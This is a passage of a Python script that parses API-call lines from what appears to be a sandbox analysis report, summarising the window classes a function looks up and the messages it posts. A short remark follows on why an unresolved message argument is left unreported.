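    unresolved args as '?'. Returns int, str or None. Caveat: an 8-character
    string that happens to be all hex digits would be read as a DWORD."""
    token = token.strip()
    if token == "?":
        return None
    if HEX8.match(token):
        return int(token, 16)
    return token


def parse_api_line(line):
    """Return {'api', 'module', 'args', 'ref'} for one APIs bullet, else None."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw.strip() else []
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
    }


def describe_message(rec):
    """For a Post/SendMessage record return (message name, wParam, lParam);
    None when the record is not a message call or the Msg arg is missing."""
    if rec is None or rec["api"] not in MESSAGE_APIS:
        return None
    args = rec["args"]
    if len(args) < 2 or not isinstance(args[1], int):
        return None  # the report did not resolve the Msg argument
    msg = args[1]
    name = WM_NAMES.get(msg, "0x%04X" % msg)
    wparam = args[2] if len(args) > 2 and isinstance(args[2], int) else None
    lparam = args[3] if len(args) > 3 and isinstance(args[3], int) else None
    return (name, wparam, lparam)


def summarize_function(lines):
    """Summarise one function's APIs block: window classes it looks up and
    the messages it posts or sends."""
    windows, messages = [], []
    for line in lines:
        rec = parse_api_line(line)
        if rec is None:
            continue
        if rec["api"] in FINDWINDOW_APIS and rec["args"] and isinstance(rec["args"][0], str):
            windows.append(rec["args"][0])
        desc = describe_message(rec)
        if desc is not None:
            messages.append(desc)
    return {"windows": windows, "messages": messages}


# Constructed input: the APIs bullets of the record above, copied verbatim.
SAMPLE = [
    "• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9596E",
    "• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A95981",
    "  • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC",
]

if __name__ == "__main__":
    print(summarize_function(SAMPLE))
```

Run over the first of the two records (where the report only resolved the hWnd argument of PostMessageW) the summary lists `Shell_TrayWnd` but no message, which is the honest result: the report does not show what was posted there, so nothing should be asserted about it.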